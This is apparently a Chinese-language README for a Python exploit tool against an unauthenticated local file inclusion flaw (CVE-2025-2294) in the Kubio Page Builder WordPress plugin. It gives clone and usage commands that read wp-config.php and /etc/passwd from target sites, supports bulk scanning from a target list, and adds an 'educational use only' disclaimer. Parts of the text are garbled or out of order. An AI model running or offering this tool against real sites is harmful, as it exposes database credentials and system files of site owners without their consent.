Kubio Page Builder WordPress 插件(版本 ≤ 2.5.1)的本地文件包含(LFI)漏洞利用工具。
该工具利用了 Kubio Page Builder 插件中的一个未授权 LFI 漏洞(CVE-2025-2294),允许攻击者读取易受攻击的 WordPress 站点上的敏感文件。
-u)-l)-o)git clone https://github.com/mrrivaldo/CVE-2025-2294.git
python3 cve-2025-2294.py -u https://vulnerable-site.com
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php
python3 cve-2025-2294.py -l targets.txt -o results.txt
python3 cve-2025-2294.py --help
targets.txt:
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com
此工具仅用于教育目的。开发者对任何滥用行为概不负责。在测试任何系统之前,请务必获得适当的授权。
| 选项 | 描述 |
|---|
-u, --url | 单个目标 URL |
-l, --list | 包含目标列表的文件 |
-f, --file | 要读取的文件(默认:/etc/passwd) |
-o, --output | 将易受攻击的目标保存到文件 |